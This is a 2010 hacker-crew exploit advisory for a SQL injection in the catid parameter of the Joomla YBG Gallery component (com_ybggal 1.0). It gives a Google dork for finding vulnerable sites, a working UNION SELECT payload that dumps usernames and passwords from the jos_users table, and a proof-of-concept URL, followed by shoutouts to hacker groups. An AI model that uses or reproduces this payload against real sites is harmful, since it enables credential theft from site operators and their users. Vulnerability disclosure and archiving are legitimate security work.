-----------------------------------------------------------------------
Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : June, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : YBG Gallery
Vendor : http://www.yusufbottiegaos.com/
Version : 1.0 Lower versions may also be affected
Google Dork : inurl:com_ybggal
----------------------------------------------------------------
Exploitz:
~~~~~~~
9999+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/index.php?option=com_ybggal&Itemid=[xxx]&catid=[SQLi]
*[xxx] = Valid itemid
----------------------------------------------------------------
Shoutz:
~~~~
- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- JosS [at] hack0wn.com
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
---------------------------[EOF]--------------------------------